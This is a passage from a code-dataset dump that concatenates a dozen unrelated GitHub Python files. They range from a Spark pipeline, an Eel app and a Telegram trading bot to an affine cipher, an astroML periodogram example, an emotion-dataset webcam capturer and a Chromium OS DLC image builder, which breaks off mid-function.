.option(\"inferSchema\", \"true\") \\\n .load(temp_file.name)\n elif format == \"csv\":\n df = spark \\\n .read \\\n .format(\"csv\") \\\n .option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .option(\"multiline\", \"true\") \\\n .load(file_path)\n # create random table name\n table_name = \"tmp_\"+str(uuid.uuid4()).replace(\"-\", \"\")\n df.createOrReplaceTempView(\"tmp_\"+table_name)\n df = spark.sql(\"select * from tmp_\"+table_name+ \" limit \"+str(25))\n data = df.toJSON().map(lambda j: json.loads(j)).collect()\n json_str = json.dumps(data)\n schema = df.schema.json()\n return json_str, schema\n\n\ndef init_staging_sample_dataframe(spark, config):\n staging_path = config[\"staging_path\"]\n for task in config[\"staging\"]:\n if 'sampleData' in task:\n target = task[\"target\"]\n output = task[\"output\"]\n task_landing_path = config['landing_path']+\"/\"+task['name']\n if not os.path.exists(task_landing_path):\n os.makedirs(task_landing_path)\n filename = task['name']+\".json\"\n sampleData = task['sampleData'] \n with open(task_landing_path+\"/\"+filename, \"w\") as text_file:\n json.dump(sampleData, text_file)\n schema = StructType.fromJson(task[\"schema\"])\n df = spark \\\n .read \\\n .format(\"json\") \\\n .option(\"multiline\", \"true\") \\\n .option(\"header\", \"true\") \\\n .schema(schema) \\\n .load(task_landing_path+\"/\"+filename) \n\n if \"table\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").saveAsTable(target)\n if \"file\" in output:\n df.write.format(storage_format).mode(\"append\").option(\"overwriteSchema\", \"true\").save(staging_path+\"/\"+target)\n if \"view\" in output:\n df.createOrReplaceTempView(target)\n\n\n","repo_name":"maye-msft/simple-configurable-data-pipeline","sub_path":"src/cddp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36057342656","text":"import eel\n\n@eel.expose\ndef hello_world():\n return \"Hello from python\"\n\n@eel.expose\ndef print_string(string):\n if len(string) > 20:\n print(string)\n return \"Success!\"\n else:\n return \"Too few characters. Please type more than 20 characters.\"\n\neel.init('web')\neel.start('index.html', size=(600, 400), options={\n 'port': 8080\n})\n","repo_name":"smketterer/vue-eel-starter","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"67"} +{"seq_id":"15105704833","text":"#!/usr/bin/python3\n# 文件名:client.py\n\n# 导入 socket、sys 模块\nimport socket\nimport sys\n\n# 创建 socket 对象\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\n# 获取本地主机名\n#host = socket.gethostname() \n#print(host)\nhost = \"127.0.0.1\"\n#print(host)\n\n# 设置端口号\nport = 11451\n\n# 连接服务,指定主机和端口\ns.connect((host, port))\n\n# 接收小于 1024 字节的数据\nmsg='hello world!'+ \"\\r\\n\"\ns.send(msg.encode('ascii'))\n\n\ns.close()\n","repo_name":"hak0/eye_mouse","sub_path":"opencv_proj/socket_client_test.py","file_name":"socket_client_test.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21383720915","text":"#data types cont\r\nis_active = True\r\ngame_over = False\r\ngame_over = True\r\n\r\n#string \r\nstring_word = \"9\"\r\nprint(type(string_word))\r\nint_wordd = 7;\r\nprint(type(int_wordd))\r\n#list\r\n\r\n#dict\r\n\r\n#ba3den","repo_name":"Hossamster/Python-Cheatsheet","sub_path":"Files/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37284348500","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 22 21:14:16 2020\n\n@author: chenfish\n\"\"\"\n\n# contextual function words \n# # of trigrams consisting of at least 2 function words / # of trigrams \n\n\nimport pandas as pd\nimport nltk\nimport math\nfrom builtins import sum\nimport os\nfrom collections import Counter\n\n\ndata_path = '/Users/yuwen/Desktop/Thesis/Project/data/ht_pe/all_no_split/mtht/'\nprint(data_path)\nprint('We are working on contextual function words.')\n\n\nfor d in os.listdir(data_path): \n \n \n if not d.startswith('.'):\n try: \n file = pd.read_pickle(data_path + d)\n print('Now we are working on', d)\n \n except IsADirectoryError:\n print('Skip the file.', d)\n continue\n \n else:\n print('Skip the file.', d)\n continue\n\n\n text = file['UD']\n \n #flatten the whole corpus \n #t = [word for doc in text for sent in doc for word in sent]\n \n \n #trigram_freq = nltk.FreqDist(nltk.trigrams(t))\n \n context_func = []\n \n\n \n for doc in text: \n \n count = 0\n trigram_count = 0 \n \n \n for line in doc:\n \n trigram_dict = nltk.FreqDist(nltk.trigrams(line))\n trigram_count += len(trigram_dict)\n \n for i in trigram_dict.keys():\n a = Counter(i)\n n = sum(a[x] for x in ['aux','cop','mark','det','clf','case'])\n if n >= 2:\n count += 1\n \n \n try: \n context_func.append(round(count/trigram_count,4))\n \n except ZeroDivisionError: \n context_func.append(0)\n\n\n #append this result to the dataframe as RANK\n file['CONTEXT FUNC'] = context_func\n \n print('saving the file...', d)\n file.to_pickle(data_path + d)\n\n\n","repo_name":"yuwenchen31/translation_detection","sub_path":"feature_calculation/contextual_func_word.py","file_name":"contextual_func_word.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38082573792","text":"import csv # imports the csv module\r\nimport sys # imports the sys module\r\nfrom collections import Counter\r\n\r\ndef getIndex(s,a):\r\n for each in a:\r\n if(each==s):\r\n return(a.index(s))\r\n else:\r\n print(\"column not found.\")\r\n return(-1)\r\n\r\ndef getCol(data,index):\r\n filename = 'col_'+str(index+1)+'.txt'\r\n f = open(filename,'w')#new file\r\n #col = []\r\n for i in range(len(data)):\r\n #col.append(data[i][index])\r\n f.write(data[i][index]+'\\n') \r\n f.close()\r\n #getCount(col)\r\n print(\"Saved as: \"+filename)\r\n #return col\r\n\r\n\r\n\r\ndef run():\r\n word = input(\"Enter the exact column name: \")\r\n if(getIndex(word,l1) != -1):\r\n index = getIndex(word,l1); #column index\r\n dataset = lines_list[1:] #dataset without headers\r\n getCol(dataset,index)\r\n\r\ndef preprocess(lines_list):\r\n for i in range(len(lines_list)):\r\n if(len(lines_list[i])!= header_length):\r\n lines_list = lines_list[:i]\r\n break\r\n return lines_list\r\n\r\ndef getCount(array):\r\n ctr = Counter(array)\r\n for key,value in ctr.items():\r\n print(str(key)+\" => \"+str(value)) \r\n\r\n\r\nn=input(\"Enter the file name without '.csv ': \")\r\nf = open(n+'.csv', 'rb') # opens the csv file\r\nlines = (line.decode('utf-8') for line in f)\r\n\r\nallLines = list(csv.reader(lines))\r\nl1 = list(allLines[0]) #line\r\nheader_length = len(l1)\r\n\r\nlines_list = preprocess(allLines)\r\n \r\nfor i in range(header_length):\r\n print(str(i+1)+\" -> \"+l1[i])\r\nwhile(True):\r\n run()\r\n\r\n\r\n","repo_name":"lahirurangitha/Read-csv-files","sub_path":"prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4313516148","text":"from aiogram import types, Bot\n\nfrom ma_trade_bot.parser.html.images import get_all_images\nfrom ma_trade_bot.urls.core import build_absolute_url\nfrom ma_trade_bot.files.upload import get_file_from_url\nfrom ma_trade_bot.paper_trader.request import PaperTradeRequest\nfrom ma_trade_bot.paper_trader.dataclasses import PostDataHandle\nfrom ma_trade_bot.root_logging.decorators import log\n\n\n@log\nasync def process_pair_info(bot: Bot, message: types.Message, data: dict):\n \"\"\" scenario for processing data pairs and sending messages by a bot \"\"\"\n\n # Creation and validation post data to paper trader\n post_data_handler = PostDataHandle(**data)\n if not post_data_handler.is_valid():\n errors_as_text = post_data_handler.errors_as_text(sep='\\n')\n return await bot.send_message(\n message.chat.id,\n f'You have entered incorrect data. Errors: {errors_as_text}'\n )\n\n data_as_text = post_data_handler.as_text(sep='\\n')\n await bot.send_message(\n message.chat.id,\n f'Your data has been accepted.'\n f'\\nData:\\n{data_as_text}'\n )\n await bot.send_message(message.chat.id, 'Wait, please. Loading data...')\n\n response = await PaperTradeRequest.post(post_data_handler.as_dict())\n response_text = await response.text()\n\n if response.status != 200:\n return await bot.send_message(message.chat.id, 'Failed to load data. Try again later')\n\n all_images = get_all_images(response_text)\n\n # process response errors\n if 'error' in response_text or len(all_images) == 0:\n return await bot.send_message(message.chat.id, 'Failed to load data or data is missing 😢'\n '\\nTry changing the input or try again later.')\n\n # get image from url as file bytes and send diagram to user\n for image in all_images:\n image_src = image.get('src')\n if image_src is None:\n continue\n\n image_absolute_url = build_absolute_url(PaperTradeRequest.HOST, image_src)\n try:\n file_bytes = await get_file_from_url(image_absolute_url)\n await bot.send_message(message.chat.id, '📈 Diagram:')\n await bot.send_photo(message.chat.id, file_bytes)\n except Exception as e:\n await bot.send_message(message.chat.id, 'Some data could not be loaded 😢')\n","repo_name":"Alex-Stulen/MAtradeBot","sub_path":"ma_trade_bot/paper_trader/bot_scripts.py","file_name":"bot_scripts.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13505066063","text":"import math\nimport random\n\nimport numpy as np\nfrom gmpy2 import invert\n\nfrom src.affine_encoder import AffineEncoder\n\n\nclass RandomizedIterativeAffineCipher(object):\n def __init__(self):\n pass\n\n @staticmethod\n def generate_keypair(key_size=1024, key_round=5, encode_precision=2 ** 100):\n key_size_array = np.linspace(start=int(key_size / 2), stop=key_size, num=key_round)\n key_size_array = np.floor(key_size_array).astype(np.int64)\n n_array = [0 for _ in range(key_round)]\n a_array = [0 for _ in range(key_round)]\n i = 0\n for key_size in key_size_array:\n n = random.SystemRandom().getrandbits(key_size)\n a_ratio = random.SystemRandom().random()\n a = 0\n while True:\n a_size = int(key_size * a_ratio)\n if a_size is 0:\n continue\n a = random.SystemRandom().getrandbits(a_size)\n if math.gcd(n, a) == 1:\n break\n n_array[i] = n\n a_array[i] = a\n i = i + 1\n\n # pick a generator and a scalar\n g = random.SystemRandom().getrandbits(key_size // 10)\n x = random.SystemRandom().getrandbits(160)\n return RandomizedIterativeAffineCipherKey(a_array, n_array, g, x, encode_precision=encode_precision)\n\n\nclass RandomizedIterativeAffineCipherKey(object):\n def __init__(self, a_array, n_array, g, x, encode_precision=2 ** 100):\n if len(a_array) != len(n_array):\n raise ValueError(\"a_array length must be equal to n_array\")\n self.a_array = a_array\n self.n_array = n_array\n self.key_round = len(self.a_array)\n self.a_inv_array = self.mod_inverse()\n self.affine_encoder = AffineEncoder(mult=encode_precision)\n self.g = g\n self.x = x\n self.h = g * x % self.n_array[0]\n\n def encrypt(self, plaintext):\n return self.raw_encrypt(self.affine_encoder.encode(plaintext))\n\n def decrypt(self, ciphertext):\n if isinstance(ciphertext, int) is True and ciphertext is 0:\n return 0\n return self.affine_encoder.decode(self.raw_decrypt(ciphertext))\n\n def raw_encrypt(self, plaintext):\n plaintext = self.encode(plaintext)\n ciphertext = RandomizedIterativeAffineCiphertext(plaintext[0], plaintext[1], self.n_array[-1])\n for i in range(self.key_round):\n ciphertext = self.raw_encrypt_round(ciphertext, i)\n return ciphertext\n\n def raw_decrypt(self, ciphertext):\n plaintext1 = ciphertext.cipher1\n plaintext2 = ciphertext.cipher2\n for i in range(self.key_round):\n plaintext1, plaintext2 = self.raw_decrypt_round(plaintext1, plaintext2, i)\n encoded_result = RandomizedIterativeAffineCiphertext(\n cipher1=plaintext1,\n cipher2=plaintext2,\n n_final=ciphertext.n_final,\n multiple=ciphertext.multiple,\n mult_times=ciphertext.mult_times\n )\n return self.decode(encoded_result)\n\n def encode(self, plaintext):\n y = random.SystemRandom().getrandbits(160)\n return y * self.g % self.n_array[0], (plaintext + y * self.h) % self.n_array[0]\n\n def decode(self, ciphertext):\n intermediate_result = (ciphertext.cipher2 - self.x * ciphertext.cipher1) % self.n_array[0]\n if intermediate_result / self.n_array[0] > 0.9:\n intermediate_result -= self.n_array[0]\n return intermediate_result / ciphertext.multiple ** ciphertext.mult_times\n\n def raw_encrypt_round(self, plaintext, round_index):\n return RandomizedIterativeAffineCiphertext(\n plaintext.cipher1,\n (self.a_array[round_index] * plaintext.cipher2) % self.n_array[round_index],\n plaintext.n_final\n )\n\n def raw_decrypt_round(self, ciphertext1, ciphertext2, round_index):\n cur_n = self.n_array[self.key_round - 1 - round_index]\n cur_a_inv = self.a_inv_array[self.key_round - 1 - round_index]\n plaintext1 = ciphertext1 % cur_n\n plaintext2 = (cur_a_inv * (ciphertext2 % cur_n)) % cur_n\n if plaintext1 / cur_n > 0.9:\n plaintext1 -= cur_n\n if plaintext2 / cur_n > 0.9:\n plaintext2 -= cur_n\n return plaintext1, plaintext2\n\n def mod_inverse(self):\n a_array_inv = [0 for _ in self.a_array]\n for i in range(self.key_round):\n a_array_inv[i] = int(invert(self.a_array[i], self.n_array[i]))\n return a_array_inv\n\n\nclass RandomizedIterativeAffineCiphertext(object):\n def __init__(self, cipher1, cipher2, n_final, multiple=2 ** 23, mult_times=0):\n self.cipher1 = cipher1\n self.cipher2 = cipher2\n self.n_final = n_final\n self.multiple = multiple\n self.mult_times = mult_times\n\n def __add__(self, other):\n if isinstance(other, RandomizedIterativeAffineCiphertext):\n if self.multiple != other.multiple or self.n_final != other.n_final:\n raise TypeError(\"Two addends must have equal multiples and n_finals\")\n if self.mult_times > other.mult_times:\n mult_times_diff = self.mult_times - other.mult_times\n return RandomizedIterativeAffineCiphertext(\n cipher1=(self.cipher1 + other.cipher1) * other.multiple * mult_times_diff % self.n_final,\n cipher2=(self.cipher2 + other.cipher2) * other.multiple * mult_times_diff % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=self.mult_times\n )\n elif self.mult_times < other.mult_times:\n mult_times_diff = self.mult_times - other.mult_times\n return RandomizedIterativeAffineCiphertext(\n cipher1=(self.cipher1 + other.cipher1) * self.multiple * mult_times_diff % self.n_final,\n cipher2=(self.cipher2 + other.cipher2) * other.multiple * mult_times_diff % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=other.mult_times\n )\n else:\n return RandomizedIterativeAffineCiphertext(\n cipher1=(self.cipher1 + other.cipher1) % self.n_final,\n cipher2=(self.cipher2 + other.cipher2) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=other.mult_times\n )\n elif type(other) is int and other == 0:\n return self\n else:\n raise TypeError(\"Addition only supports IterativeAffineCiphertext and initialization with int zero\")\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __sub__(self, other):\n return self + (other * -1)\n\n def __rsub__(self, other):\n return other + (self * -1)\n\n def __mul__(self, other):\n if type(other) is float or type(other) is np.float32 or type(other) is np.float64:\n return RandomizedIterativeAffineCiphertext(\n cipher1=self.cipher1 * int(other * self.multiple) % self.n_final,\n cipher2=self.cipher2 * int(other * self.multiple) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=self.mult_times + 1\n )\n elif type(other) is int or type(other) is np.int32 or type(other) is np.int64:\n return RandomizedIterativeAffineCiphertext(\n cipher1=self.cipher1 * int(other) % self.n_final,\n cipher2=self.cipher2 * int(other) % self.n_final,\n n_final=self.n_final,\n multiple=self.multiple,\n mult_times=self.mult_times\n )\n else:\n raise TypeError(\"Multiplication only supports native and numpy int and float\")\n\n def __rmul__(self, other):\n return self.__mul__(other)\n","repo_name":"duanbing/RandomizedIterativeAffineCipher","sub_path":"src/randomized_iterative_affine_cipher.py","file_name":"randomized_iterative_affine_cipher.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"3675795157","text":"\"\"\"\nExample of Lomb-Scargle Algorithm\n---------------------------------\n\"\"\"\n# Author: Jake VanderPlas \n# License: BSD\n# The figure produced by this code is published in the textbook\n# \"Statistics, Data Mining, and Machine Learning in Astronomy\" (2013)\n# For more information, see http://astroML.github.com\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom astroML.time_series import\\\n lomb_scargle, lomb_scargle_BIC, lomb_scargle_bootstrap\n\n#------------------------------------------------------------\n# Generate Data\nnp.random.seed(0)\nN = 30\nP = 0.3\n\nt = np.random.randint(100, size=N) + 0.3 + 0.4 * np.random.random(N)\ny = 10 + np.sin(2 * np.pi * t / P)\ndy = 0.5 + 0.5 * np.random.random(N)\ny_obs = np.random.normal(y, dy)\n\n#------------------------------------------------------------\n# Compute periodogram\nperiod = 10 ** np.linspace(-1, 0, 10000)\nomega = 2 * np.pi / period\nPS = lomb_scargle(t, y_obs, dy, omega, generalized=True)\n\n#------------------------------------------------------------\n# Get significance via bootstrap\nD = lomb_scargle_bootstrap(t, y_obs, dy, omega, generalized=True,\n N_bootstraps=1000, random_state=0)\nsig1, sig5 = np.percentile(D, [99, 95])\n\n#------------------------------------------------------------\n# Plot the results\nfig = plt.figure()\nfig.subplots_adjust(left=0.1, right=0.9, hspace=0.25)\n\n# First panel: the data\nax = fig.add_subplot(211)\nax.errorbar(t, y_obs, dy, fmt='.k', lw=1, ecolor='gray')\nax.set_xlabel('time (days)')\nax.set_ylabel('flux')\nax.set_xlim(-5, 105)\n\n# Second panel: the periodogram & significance levels\nax1 = fig.add_subplot(212, xscale='log')\nax1.plot(period, PS, '-', c='black', lw=1, zorder=1)\nax1.plot([period[0], period[-1]], [sig1, sig1], ':', c='black')\nax1.plot([period[0], period[-1]], [sig5, sig5], ':', c='black')\n\nax1.annotate(\" \", (0.3, 0.65), (0.3, 0.85), ha='center',\n arrowprops=dict(arrowstyle='->'))\n\nax1.set_xlim(period[0], period[-1])\nax1.set_ylim(-0.05, 0.85)\n\nax1.set_xlabel(r'period (days)')\nax1.set_ylabel('power')\n\n# Twin axis: label BIC on the right side\nax2 = ax1.twinx()\nax2.set_ylim(tuple(lomb_scargle_BIC(ax1.get_ylim(), y_obs, dy)))\nax2.set_ylabel(r'$\\Delta BIC$')\n\nax1.xaxis.set_major_formatter(plt.FormatStrFormatter('%.1f'))\nax1.xaxis.set_minor_formatter(plt.FormatStrFormatter('%.1f'))\nax1.xaxis.set_major_locator(plt.LogLocator(10))\nax1.xaxis.set_major_formatter(plt.FormatStrFormatter('%.3g'))\n\nplt.show()\n","repo_name":"ryanmaas/astroML","sub_path":"book_figures/chapter10/fig_LS_example.py","file_name":"fig_LS_example.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"73490663253","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nimport time\r\nimport math\r\nfrom face import Face\r\nfrom ttk import Label\r\nfrom PIL import Image, ImageTk\r\nfrom modules import VideoStream\r\n\r\nclass dataCreator(Label):\r\n def __init__(self,label,vs):\r\n self.face = Face()\r\n self.label = label\r\n self.vs = vs\r\n self.emotions = ['Angry','Happy','Neutral','Sad','Shocked']\r\n self.target = \"Dataset\"\r\n\r\n def create(self):\r\n for emotion in self.emotions:\r\n print (\"please look {}. Press Capture button when ready\".format(emotion))\r\n start_time = time.time()\r\n elapsed_time = time.time()-start_time\r\n sample = 0\r\n if os.path.exists(self.target+os.sep+emotion):\r\n pass\r\n else:\r\n os.mkdir(self.target+os.sep+emotion)\r\n \r\n while True:\r\n while elapsed_time < 3.0 :\r\n image = self.vs.read()\r\n image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\r\n elapsed_time = int(time.time()-start_time)\r\n \r\n text = \"Starting in {} seconds\".format(3 - elapsed_time)\r\n\r\n cv2.putText(image,str(text),(20,40),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\r\n\r\n cv2.waitKey(100)\r\n img = Image.fromarray(image)\r\n\r\n img = ImageTk.PhotoImage(img)\r\n\r\n self.label.configure(image = img)\r\n self.label.image = img\r\n \r\n image = self.vs.read()\r\n \r\n if (sample > 20):\r\n break\r\n else:\r\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\r\n image_copy = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\r\n faces = self.face.detect(gray)\r\n for x,y,w,h in faces:\r\n sample += 1\r\n #frame = image[y-10:y+h+10,x-10:x+w+10]\r\n cv2.rectangle(image_copy,(x,y),(x+w,y+h),(255,0,0),1)\r\n cv2.imwrite(self.target + os.sep + emotion + os.sep +str(time.time()) + \".jpg\",image)\r\n\r\n cv2.waitKey(100)\r\n\r\n img = Image.fromarray(image_copy)\r\n\r\n img = ImageTk.PhotoImage(img)\r\n\r\n self.label.configure(image = img)\r\n\r\n self.label.image = img\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BijayOCT25/Facial-Expression-Recognition-System","sub_path":"dataCreator.py","file_name":"dataCreator.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"44283957219","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='pigconf',\n version='0.0.3',\n author=\"Anshuman Rohella\",\n author_email=\"rohella.anshuman@gmail.com\",\n description='A yaml config mapper to create static config classes.',\n url=\"https://github.com/AnshumanRohella/pigconf\",\n classifiers=[\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Operating System :: OS Independent\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(),\n install_requires=['PyYAML>=5.4.1'],\n extras_require={\n \"dev\": [\n \"pytest>=6.2.2\",\n \"check-manifest>=0.46\"\n ],\n },\n)\n","repo_name":"AnshumanRohella/pigconf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"43974112263","text":"from __future__ import print_function\n\nimport hashlib\nimport json\nimport math\nimport os\nimport shutil\n\nfrom chromite.lib import commandline\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import cros_logging as logging\nfrom chromite.lib import osutils\n\nfrom chromite.scripts import cros_set_lsb_release\n\nDLC_META_DIR = 'opt/google/dlc/'\nDLC_IMAGE_DIR = 'build/rootfs/dlc/'\nLSB_RELEASE = 'etc/lsb-release'\n\n# This file has major and minor version numbers that the update_engine client\n# supports. These values are needed for generating a delta/full payload.\nUPDATE_ENGINE_CONF = 'etc/update_engine.conf'\n\n_EXTRA_RESOURCES = (\n UPDATE_ENGINE_CONF,\n)\n\nDLC_ID_KEY = 'DLC_ID'\nDLC_PACKAGE_KEY = 'DLC_PACKAGE'\nDLC_NAME_KEY = 'DLC_NAME'\nDLC_APPID_KEY = 'DLC_RELEASE_APPID'\n\n_SQUASHFS_TYPE = 'squashfs'\n_EXT4_TYPE = 'ext4'\n\n\ndef HashFile(file_path):\n \"\"\"Calculate the sha256 hash of a file.\n\n Args:\n file_path: (str) path to the file.\n\n Returns:\n [str]: The sha256 hash of the file.\n \"\"\"\n sha256 = hashlib.sha256()\n with open(file_path, 'rb') as f:\n for b in iter(lambda: f.read(2048), b''):\n sha256.update(b)\n return sha256.hexdigest()\n\n\nclass DlcGenerator(object):\n \"\"\"Object to generate DLC artifacts.\"\"\"\n # Block size for the DLC image.\n # We use 4K for various reasons:\n # 1. it's what imageloader (linux kernel) supports.\n # 2. it's what verity supports.\n _BLOCK_SIZE = 4096\n # Blocks in the initial sparse image.\n _BLOCKS = 500000\n # Version of manifest file.\n _MANIFEST_VERSION = 1\n\n # The DLC root path inside the DLC module.\n _DLC_ROOT_DIR = 'root'\n\n def __init__(self, src_dir, sysroot, install_root_dir, fs_type,\n pre_allocated_blocks, version, dlc_id, dlc_package, name):\n \"\"\"Object initializer.\n\n Args:\n src_dir: (str) path to the DLC source root directory.\n sysroot: (str) The path to the build root directory.\n install_root_dir: (str) The path to the root installation directory.\n fs_type: (str) file system type.\n pre_allocated_blocks: (int) number of blocks pre-allocated on device.\n version: (str) DLC version.\n dlc_id: (str) DLC ID.\n dlc_package: (str) DLC Package.\n name: (str) DLC name.\n \"\"\"\n self.src_dir = src_dir\n self.sysroot = sysroot\n self.install_root_dir = install_root_dir\n self.fs_type = fs_type\n self.pre_allocated_blocks = pre_allocated_blocks\n self.version = version\n self.dlc_id = dlc_id\n self.dlc_package = dlc_package\n self.name = name\n\n self.meta_dir = os.path.join(self.install_root_dir, DLC_META_DIR,\n self.dlc_id, self.dlc_package)\n self.image_dir = os.path.join(self.install_root_dir, DLC_IMAGE_DIR,\n self.dlc_id, self.dlc_package)\n osutils.SafeMakedirs(self.meta_dir)\n osutils.SafeMakedirs(self.image_dir)\n\n # Create path for all final artifacts.\n self.dest_image = os.path.join(self.image_dir, 'dlc.img')\n self.dest_table = os.path.join(self.meta_dir, 'table')\n self.dest_imageloader_json = os.path.join(self.meta_dir, 'imageloader.json')\n\n def SquashOwnerships(self, path):\n \"\"\"Squash the owernships & permissions for files.\n\n Args:\n path: (str) path that contains all files to be processed.\n \"\"\"\n cros_build_lib.SudoRunCommand(['chown', '-R', '0:0', path])\n cros_build_lib.SudoRunCommand(\n ['find', path, '-exec', 'touch', '-h', '-t', '197001010000.00', '{}',\n '+'])\n\n def CreateExt4Image(self):\n \"\"\"Create an ext4 image.\"\"\"\n with osutils.TempDir(prefix='dlc_') as temp_dir:\n mount_point = os.path.join(temp_dir, 'mount_point')\n # Create a raw image file.\n with open(self.dest_image, 'w') as f:\n f.truncate(self._BLOCKS * self._BLOCK_SIZE)\n # Create an ext4 file system on the raw image.\n cros_build_lib.RunCommand(\n ['/sbin/mkfs.ext4', '-b', str(self._BLOCK_SIZE), '-O',\n '^has_journal', self.dest_image], capture_output=True)\n # Create the mount_point directory.\n osutils.SafeMakedirs(mount_point)\n # Mount the ext4 image.\n osutils.MountDir(self.dest_image, mount_point, mount_opts=('loop', 'rw'))\n\n try:\n self.SetupDlcImageFiles(mount_point)\n finally:\n # Unmount the ext4 image.\n osutils.UmountDir(mount_point)\n # Shrink to minimum size.\n cros_build_lib.RunCommand(\n ['/sbin/e2fsck', '-y', '-f', self.dest_image], capture_output=True)\n cros_build_lib.RunCommand(\n ['/sbin/resize2fs', '-M', self.dest_image], capture_output=True)\n\n def CreateSquashfsImage(self):\n \"\"\"Create a squashfs image.\"\"\"\n with osutils.TempDir(prefix='dlc_') as temp_dir:\n squashfs_root = os.path.join(temp_dir, 'squashfs-root')\n self.SetupDlcImageFiles(squashfs_root)\n\n cros_build_lib.RunCommand(['mksquashfs', squashfs_root, self.dest_image,\n '-4k-align', '-noappend'],\n capture_output=True)\n\n # We changed the ownership and permissions of the squashfs_root\n # directory. Now we need to remove it manually.\n osutils.RmDir(squashfs_root, sudo=True)\n\n def SetupDlcImageFiles(self, dlc_dir):\n \"\"\"Prepares the directory dlc_dir with all the files a DLC needs.\n\n Args:\n dlc_dir: (str) The path to where to setup files inside the DLC.\n \"\"\"\n dlc_root_dir = os.path.join(dlc_dir, self._DLC_ROOT_DIR)\n osutils.SafeMakedirs(dlc_root_dir)\n osutils.CopyDirContents(self.src_dir, dlc_root_dir)\n self.PrepareLsbRelease(dlc_dir)\n self.CollectExtraResources(dlc_dir)\n self.SquashOwnerships(dlc_dir)\n\n def PrepareLsbRelease(self, dlc_dir):\n \"\"\"Prepare the file /etc/lsb-release in the DLC module.\n\n This file is used dropping some identification parameters for the DLC.\n\n Args:\n dlc_dir: (str) The path to root directory of the DLC. e.g. mounted point\n when we are creating the image.\n \"\"\"\n # Reading the platform APPID and creating the DLC APPID.\n platform_lsb_release = osutils.ReadFile(os.path.join(self.sysroot,\n LSB_RELEASE))\n app_id = None\n for line in platform_lsb_release.split('\\n'):\n if line.startswith(cros_set_lsb_release.LSB_KEY_APPID_RELEASE):\n app_id = line.split('=')[1]\n if app_id is None:\n raise Exception('%s does not have a valid key %s' %\n (platform_lsb_release,\n cros_set_lsb_release.LSB_KEY_APPID_RELEASE))\n\n fields = {\n DLC_ID_KEY: self.dlc_id,\n DLC_PACKAGE_KEY: self.dlc_package,\n DLC_NAME_KEY: self.name,\n # The DLC appid is generated by concatenating the platform appid with\n # the DLC ID using an underscore. This pattern should never be changed\n # once set otherwise it can break a lot of things!\n DLC_APPID_KEY: '%s_%s' % (app_id, self.dlc_id),\n }\n\n lsb_release = os.path.join(dlc_dir, LSB_RELEASE)\n osutils.SafeMakedirs(os.path.dirname(lsb_release))\n content = ''.join(['%s=%s\\n' % (k, v) for k, v in fields.items()])\n osutils.WriteFile(lsb_release, content)\n\n def CollectExtraResources(self, dlc_dir):\n \"\"\"Collect the extra resources needed by the DLC module.\n\n Look at the documentation around _EXTRA_RESOURCES.\n\n Args:\n dlc_dir: (str) The path to root directory of the DLC. e.g. mounted point\n when we are creating the image.\n \"\"\"\n for r in _EXTRA_RESOURCES:\n source_path = os.path.join(self.sysroot, r)\n target_path = os.path.join(dlc_dir, r)\n osutils.SafeMakedirs(os.path.dirname(target_path))\n shutil.copyfile(source_path, target_path)\n\n def CreateImage(self):\n \"\"\"Create the image and copy the DLC files to it.\"\"\"\n if self.fs_type == _EXT4_TYPE:\n self.CreateExt4Image()\n elif self.fs_type == _SQUASHFS_TYPE:\n self.CreateSquashfsImage()\n else:\n raise ValueError('Wrong fs type: %s used:' % self.fs_type)\n\n def GetImageloaderJsonContent(self, image_hash, table_hash, 